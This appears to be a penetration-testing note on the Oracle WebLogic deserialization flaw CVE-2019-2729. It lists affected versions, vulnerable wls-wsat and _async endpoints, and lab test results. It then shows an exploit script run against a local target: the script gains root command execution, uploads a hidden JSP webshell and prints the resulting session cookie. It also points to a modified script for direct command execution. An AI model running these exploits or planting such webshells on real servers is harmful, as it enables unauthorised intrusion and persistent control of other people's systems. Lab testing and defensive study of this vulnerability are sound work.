WebLogic — CVE-2019-2729
Oracle WebLogic server is affected by a remote code execution vulnerability in wls-wsat.war and wls9_async_response.war packages due to unsafe deserialization of Java objects. A remote unauthenticated attacker can exploit the issue by sending a custom Java serialized object via HTTP request to execute arbitrary Java code in the context of the web server.
Exploiting wls-wsat.war will return command output, while wls9_async_response.war is blind.
Affected versions: 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0
Vulnerable endpoints
wls-wsat.war (cmd response)
- /wls-wsat/CoordinatorPortType
- /wls-wsat/RegistrationPortTypeRPC
- /wls-wsat/ParticipantPortType
- /wls-wsat/RegistrationRequesterPortType
- /wls-wsat/CoordinatorPortType11
- /wls-wsat/RegistrationPortTypeRPC11
- /wls-wsat/ParticipantPortType11
- /wls-wsat/RegistrationRequesterPortType11
wls9_async_response.war (blind)
- /_async/AsyncResponseService
Test data
| Version | Image | Result | Reason |
|---|---|---|---|
| 10.3.6.0 | VulnHub 10.3.6.0-2017 | Vulnerable | wls-wsat deserialization |
| 12.2.1.3 | VulnHub 12.2.1.3-2018 | Not vulnerable | Endpoints missing |
| 12.2.1.3 | VulnHub 12.2.1.3 | Not vulnerable | Endpoints missing |
| 12.2.1.3 | weblogic:12.2.1.3 | Inconclusive | "Old format work area header is disabled." |
Scripts
weblogic_get_webshell.py - runs three payloads on target at once, by rootedshell.
» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami :
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
rootA modified version of rootedshell's script uploads webshells and enables direct command execution via the /_async/ endpoint, available in the weblogic_webshell repository.